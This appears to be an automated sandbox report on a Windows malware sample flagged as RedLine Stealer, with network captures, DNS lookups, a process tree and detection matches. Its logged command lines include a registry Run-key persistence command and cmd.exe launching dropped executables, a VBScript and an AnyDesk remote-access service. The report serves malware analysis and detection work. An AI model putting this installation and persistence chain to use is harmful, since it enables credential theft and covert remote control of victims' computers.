                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280356884 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280471087 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280596972 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280662060 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280673027 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280682087 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280736923 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280795097 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280837059 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280901909 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280934095 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281035900 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281045914 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281255007 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439565897 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439578056 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439588070 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439603090 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440068007 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440157890 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440201998 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440248966 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440355062 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440391064 CET29094973867.203.7.148192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 3, 2024 13:32:02.681746960 CET | 54722 | 53 | 192.168.2.4 | 1.1.1.1
Mar 3, 2024 13:32:02.770494938 CET | 53 | 54722 | 1.1.1.1 | 192.168.2.4
Mar 3, 2024 13:32:03.912434101 CET | 52966 | 53 | 192.168.2.4 | 1.1.1.1
Mar 3, 2024 13:32:04.001440048 CET | 53 | 52966 | 1.1.1.1 | 192.168.2.4
Mar 3, 2024 13:32:06.505379915 CET | 55051 | 53 | 192.168.2.4 | 1.1.1.1
Mar 3, 2024 13:32:06.619204044 CET | 53 | 55051 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 3, 2024 13:32:02.681746960 CET | 192.168.2.4 | 1.1.1.1 | 0xa6f1 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:03.912434101 CET | 192.168.2.4 | 1.1.1.1 | 0x817b | Standard query (0) | relay-6a630189.net.anydesk.com | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:06.505379915 CET | 192.168.2.4 | 1.1.1.1 | 0xbb09 | Standard query (0) | api.playanext.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 3, 2024 13:32:02.770494938 CET | 1.1.1.1 | 192.168.2.4 | 0xa6f1 | No error (0) | boot.net.anydesk.com |  | 185.229.191.44 | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:04.001440048 CET | 1.1.1.1 | 192.168.2.4 | 0x817b | No error (0) | relay-6a630189.net.anydesk.com |  | 64.31.23.26 | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:06.619204044 CET | 1.1.1.1 | 192.168.2.4 | 0xbb09 | No error (0) | api.playanext.com | d1atxff5avezsq.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 3, 2024 13:32:06.619204044 CET | 1.1.1.1 | 192.168.2.4 | 0xbb09 | No error (0) | d1atxff5avezsq.cloudfront.net |  | 18.173.219.36 | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:06.619204044 CET | 1.1.1.1 | 192.168.2.4 | 0xbb09 | No error (0) | d1atxff5avezsq.cloudfront.net |  | 18.173.219.116 | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:06.619204044 CET | 1.1.1.1 | 192.168.2.4 | 0xbb09 | No error (0) | d1atxff5avezsq.cloudfront.net |  | 18.173.219.118 | A (IP address) | IN (0x0001) | false
Mar 3, 2024 13:32:06.619204044 CET | 1.1.1.1 | 192.168.2.4 | 0xbb09 | No error (0) | d1atxff5avezsq.cloudfront.net |  | 18.173.219.85 | A (IP address) | IN (0x0001) | false
• api.playanext.com
• user-agent: anydesk
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 185.229.191.44 | 80 | 5768 | C:\ProgramData\WinNet\AnyDesk.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 64.31.23.26 | 80 | 5768 | C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Data Ascii: #JY`]l>.C8>'Ht
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.541076899 CET92OUTData Raw: 17 03 03 00 57 65 65 36 55 dc af b6 32 af 22 e3 f8 fb ad 95 83 71 ff 0b 06 e2 7b 7a 39 51 11 1a 19 35 c6 00 3a f6 c3 03 7d ae 7d 07 c6 f5 8c 4c 92 5b 16 ec 76 14 16 08 51 24 70 ab 70 a7 33 54 d2 4f b0 20 18 32 48 bf 2e 48 ec ae 1e d5 82 29 d8 b4
                                                                                                                                                                                                                                                Data Ascii: Wee6U2"q{z9Q5:}}L[vQ$pp3TO 2H.H)lp6
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.893749952 CET146INData Raw: 17 03 03 00 8d 4a fc 8a fc 0f de 92 5a b4 08 43 1b 51 5b 42 29 c7 fd b0 4b 4e 63 78 30 3d 4a b3 0e 99 b2 1f 52 4c be b5 cc c7 1c cb 9e be 3b 45 98 d3 79 27 26 ed 93 c6 ad a8 2d b1 5c f7 d3 d3 f7 9c 63 d9 68 69 43 49 5c cb 2a 4a e5 6f bb 3d c4 40
                                                                                                                                                                                                                                                Data Ascii: JZCQ[B)KNcx0=JRL;Ey'&-\chiCI\*Jo=@/rx`Ww-=,#yLcNzg4F'qfrz6#
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.928443909 CET576OUTData Raw: 17 03 03 02 3b 65 65 36 55 dc af b6 33 ca 5d 29 1b ab e9 94 a2 5a 75 a7 23 ca 6b ea 5b b9 06 22 5c c4 23 03 05 de cc 5a 1d ec e4 46 b9 4e 39 1d 5d 65 94 21 49 b3 6a cb 91 a4 5d 06 0e d5 a8 34 5b 44 bf 6f 87 cc c3 76 6a b5 f5 c5 5d ed 32 91 69 5f
                                                                                                                                                                                                                                                Data Ascii: ;ee6U3])Zu#k["\#ZFN9]e!Ij]4[Dovj]2i_nr68|I56f<O0%y9T$@\<l\8^].UjRlsac|/nIF:? .%L--OgC%:jv~B-uZ,


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49735
Destination IP: 18.173.219.85
Destination Port: 80
PID: 5768
Process: C:\ProgramData\WinNet\AnyDesk.exe
Timestamp: Mar 3, 2024 13:32:06.722198963 CET
Bytes transferred: 506
Direction: OUT
Data:
POST /httpapi HTTP/1.1
Host: api.playanext.com
User-Agent: AnyDesk/8.0.8
Accept: */*
Content-Length: 352
Content-Type: application/x-www-form-urlencoded

api_key=c1426bd258099fa69f62933b466d4b77&event=[{"event_type":"check_offer","user_id":"f9be650e732b28999541a3d29be8e5d3","session_id":1709469125922881,"ip":"$remote","event_properties":{"method_used":"Google Chrome Criteria Checker","offer_product":"Google Chrome","distributor":"AnyDesk","distributor_product":"AnyDesk","user_country":"Switzerland"}}

Timestamp: Mar 3, 2024 13:32:06.861197948 CET
Bytes transferred: 620
Direction: IN
Data:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 0
Connection: keep-alive
Date: Sun, 03 Mar 2024 12:32:06 GMT
x-amzn-RequestId: 89e3f0f8-1129-4e6e-9c17-5612a2ba27e8
x-amz-apigw-id: UDYXGHe0IAMEFng=
X-Amzn-Trace-Id: Root=1-65e46dc6-2a2d5d325272d89f77cb4c32;Parent=2c124bee24531184;Sampled=0;lineage=d7502c8f:0
Via: 1.1 acbc16f609c0c9804b8a2c3d38d3023e.cloudfront.net (CloudFront), 1.1 39cd5ffcd7df50a48d03f7c7f50d3d1a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P4
X-Cache: Miss from cloudfront
X-Amz-Cf-Pop: JFK52-P1
X-Amz-Cf-Id: xjKEer1d96Nn56wkkiggsRZ9j7at2wY54L0iiic3ZvfZ2ADAGtD6uQ==



                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:13:31:55
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6f6b40000
                                                                                                                                                                                                                                                File size:21'906'944 bytes
                                                                                                                                                                                                                                                MD5 hash:2E501240EC8B9AAB46D76A6504E44882
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff628e90000
                                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\embedded.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

Target ID:5
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:13:31:56
Start date:03/03/2024
Path:C:\ProgramData\WinNet\embedded.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\WinNet\embedded.exe
Imagebase:0x7ff73bbf0000
File size:12'371'456 bytes
MD5 hash:DB408CB75C1D0DA769C19A6CBBE60D87
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\ProgramData\WinNet\embedded.exe, Author: Joe Security
Antivirus matches:
• Detection: 58%, ReversingLabs
Reputation:low
Has exited:false

Target ID:8
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
Imagebase:0x7ff750f20000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
Imagebase:0x7ff628e90000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe
Imagebase:0x7ff618ed0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:11
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c C:\ProgramData\WinNet\p.vbs
Imagebase:0x7ff618ed0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:13:31:56
Start date:03/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\WinNet\gg.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:13:31:57
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                Start time:13:31:57
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                                                                                                                                                                                                                                Imagebase:0x7ff750f20000
                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                Start time:13:31:58
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0xf20000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                Start time:13:31:59
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\AnyDesk.exe" --local-service
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:13:31:59
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\AnyDesk.exe" --local-control
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:13:32:05
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                Imagebase:0x7ff6f0940000
                                                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                Start time:13:32:13
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0xc40000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cf2fe28fef598741c2ecf4e55fd315f86f7e88fc84d962f22dc4bae8e59b4267
                                                                                                                                                                                                                                                  • Instruction ID: ec914048efeee6c40e6461447132d3c7a294c18d2c54d32812e0c51300460574
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf2fe28fef598741c2ecf4e55fd315f86f7e88fc84d962f22dc4bae8e59b4267
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D424831618E0D8FDB9CEF5CC488BA9B7E0FF59300F180559D49AE7692CA39E951DB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
